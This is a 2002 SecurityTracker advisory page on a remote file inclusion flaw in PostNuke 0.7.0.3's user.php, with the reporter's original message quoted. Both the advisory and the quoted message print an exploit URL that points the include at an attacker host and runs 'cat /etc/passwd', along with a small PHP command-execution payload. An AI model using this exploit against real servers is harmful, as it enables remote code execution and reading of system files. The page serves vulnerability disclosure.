SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Forum/Board/Portal)  >  PostNuke Vendors:  [Multiple Authors/Vendors]
PostNuke 'user.php' Flaw Lets Remote Users Specify a Remote Server Path for the $caselist Variable, Allowing Arbitrary Code to Be Executed on the PostNuke Server
Date:  Mar 29 2002
Impact:  Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 0.7.0.3
Description:  A vulnerability was reported in PostNuke. A remote user can cause arbitrary PHP code to be executed on the server.

It is reported that a remote user can exploit a bug in the file 'user.php' to append the $caselist array with a user-supplied value. This allows the remote user to specify PHP code on a remote server so that the PHP code will be executed on the target server.

The flaw is reported to be on line 107:

foreach ($caselist as $k=>$v)
{
$ModName = $v['module'];
include "$v[path]/$k";
}
$caselist = array();

A remote user can use the following type of URL to trigger the flaw:

http://[targethost]/user.php?caselist[bad_file.txt][path]=http://bad_host&command=ca t%20/etc/passwd

In the above example, the following type of code is required on the malicious server ('bad_host'):

-- start bad_file.txt -----
<pre>
<?php
system($command);
?>
-- end bad_file.txt ----- exploitstring:http://[targethost]/user.php?caselist[bad_file.txt][path]=http://bad_host&command=cat%20/etc/passwd exploitcode:-- start bad_file.txt -----
<pre>
<?php
system($command);
?>
-- end bad_file.txt -----
Impact:  A remote user can cause arbitrary PHP code to be executed by the server.
Solution:  No solution was available at the time of this entry.

The author of the report has provided the following quick fix:

put on line 28 :
$caselist = array();
Vendor URL:  www.postnuke.com/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  pokleyzz sakamaniaka <pokleyzz@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  28 Mar 2002 01:03:21 -0000
From:  pokleyzz sakamaniaka <pokleyzz@hotmail.com>
Subject:  postnuke v 0.7.0.3 remote command execution

 



post nuke is one of popular content management 
system written in php . there are bug in file user.php 
line 107
which user can append $caselist array with their own 
value.

foreach ($caselist as $k=>$v)
 
    $ModName = $v['module'];
    include "$v[path]/$k";
 
$caselist = array();

http://lame_host/user.php?caselist[bad_file.txt][path]
=http://bad_host&command=cat%20/etc/passwd

bad_file.txt (put in bad_host document root):

-- start bad_file.txt -----
<pre>
<?php 
system($command);
?>
-- end bad_file.txt -----

quick fix: 
put on line 28 :
$caselist = array();

http://inetd-secure.net/
http://www.mybsd.org.my/pokleyzz/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC